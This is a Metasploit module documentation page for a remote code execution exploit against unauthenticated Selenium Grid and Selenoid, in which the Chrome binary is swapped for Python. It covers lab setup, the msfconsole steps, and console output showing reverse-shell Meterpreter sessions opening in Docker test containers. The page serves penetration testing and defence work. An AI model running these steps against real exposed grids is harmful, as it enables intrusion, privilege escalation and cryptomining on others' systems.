adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
3dd3661352cfc98a36240d09338e23fce77d9dd5
metasploit-gs/documentation/modules/exploit/linux/http/selenium_greed_chrome_rce.md
T
Valentin Lobstein 3dd3661352 Feat: Add Selenoid support to Selenium Grid Chrome RCE module
2026-02-21 12:34:09 +01:00

4.4 KiB
Raw Blame History

Vulnerable Application

Selenium Grid and Selenoid expose a WebDriver API that allows creating browser sessions with arbitrary capabilities. When deployed without authentication (the default for both), an attacker can create a Chrome session with a custom binary path via goog:chromeOptions, replacing the Chrome binary with an interpreter such as Python to achieve arbitrary command execution.

This technique was documented by Wiz Research as "SeleniumGreed" and has been observed in real-world cryptomining campaigns targeting exposed Selenium Grid instances.

The default Docker images run as seluser/selenium which has passwordless sudo, allowing trivial privilege escalation to root.

The vulnerability affects:

* Selenium Grid < 4.11.0 (stereotype capabilities merge was introduced in 4.11.0, preventing binary override)
* Selenoid - all versions (capabilities are proxied to ChromeDriver without filtering, project archived December 2024)

This module was successfully tested on:

* selenium/standalone-chrome:4.1.0 installed with Docker on Ubuntu 24.04
* selenium/standalone-chrome:4.10.0 installed with Docker on Ubuntu 24.04
* Selenoid 1.11.3 with selenoid/chrome:128.0 installed with Docker on Ubuntu 24.04

Installation (Selenium Grid)

  1. docker pull selenium/standalone-chrome:4.10.0

  2. docker run -d -p 4444:4444 --shm-size="2g" selenium/standalone-chrome:4.10.0

Installation (Selenoid)

  1. Create browsers.json:
{
  "chrome": {
    "default": "128.0",
    "versions": {
      "128.0": {
        "image": "selenoid/chrome:128.0",
        "port": "4444",
        "path": "/"
      }
    }
  }
}

  1. docker pull selenoid/chrome:128.0

  2. Start Selenoid:

docker run -d -p 4444:4444 -e DOCKER_API_VERSION=1.44 \
  -v $(pwd)/browsers.json:/etc/selenoid/browsers.json:ro \
  -v /var/run/docker.sock:/var/run/docker.sock \
  aerokube/selenoid:latest-release

Verification Steps

  1. Install the application
  2. Start msfconsole
  3. Do: use exploit/linux/http/selenium_greed_chrome_rce
  4. Do: set RHOSTS <rhost>
  5. Do: set LHOST <lhost>
  6. Do: run
  7. You should get a session

Options

No non-standard options.

Scenarios

Selenium Grid - selenium/standalone-chrome:4.10.0 on Ubuntu 24.04

msf6 > use exploit/linux/http/selenium_greed_chrome_rce
[*] No payload configured, defaulting to python/meterpreter/reverse_tcp
msf6 exploit(linux/http/selenium_greed_chrome_rce) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 exploit(linux/http/selenium_greed_chrome_rce) > set LHOST 172.17.0.1
LHOST => 172.17.0.1
msf6 exploit(linux/http/selenium_greed_chrome_rce) > set LPORT 4454
LPORT => 4454
msf6 exploit(linux/http/selenium_greed_chrome_rce) > run
[*] Started reverse TCP handler on 172.17.0.1:4454
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Selenium Grid 4.10.0 detected (vulnerable to binary override)
[*] Sending session request with binary override...
[*] Sending stage (23408 bytes) to 172.17.0.5
[*] Meterpreter session 1 opened (172.17.0.1:4454 -> 172.17.0.5:34580) at 2026-02-21 12:32:50 +0100

meterpreter > getuid
Server username: seluser
meterpreter > sysinfo
Computer     : 172.17.0.5
OS           : Linux 6.14.0-123037-tuxedo
Architecture : x64
Meterpreter  : python/linux
meterpreter >

Selenoid 1.11.3 - selenoid/chrome:128.0 on Ubuntu 24.04

msf6 > use exploit/linux/http/selenium_greed_chrome_rce
[*] No payload configured, defaulting to python/meterpreter/reverse_tcp
msf6 exploit(linux/http/selenium_greed_chrome_rce) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 exploit(linux/http/selenium_greed_chrome_rce) > set LHOST 172.17.0.1
LHOST => 172.17.0.1
msf6 exploit(linux/http/selenium_greed_chrome_rce) > set LPORT 4453
LPORT => 4453
msf6 exploit(linux/http/selenium_greed_chrome_rce) > run
[*] Started reverse TCP handler on 172.17.0.1:4453
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Selenoid 1.11.3 built at 2024-05-25_12:34:40PM (all versions vulnerable to binary override)
[*] Sending session request with binary override...
[*] Sending stage (23408 bytes) to 172.17.0.10
[*] Meterpreter session 1 opened (172.17.0.1:4453 -> 172.17.0.10:42984) at 2026-02-21 12:32:25 +0100

meterpreter > getuid
Server username: selenium
meterpreter > sysinfo
Computer     : 669a719f93da
OS           : Linux 6.14.0-123037-tuxedo
Architecture : x64
Meterpreter  : python/linux
meterpreter >
Reference in New Issue View Git Blame Copy Permalink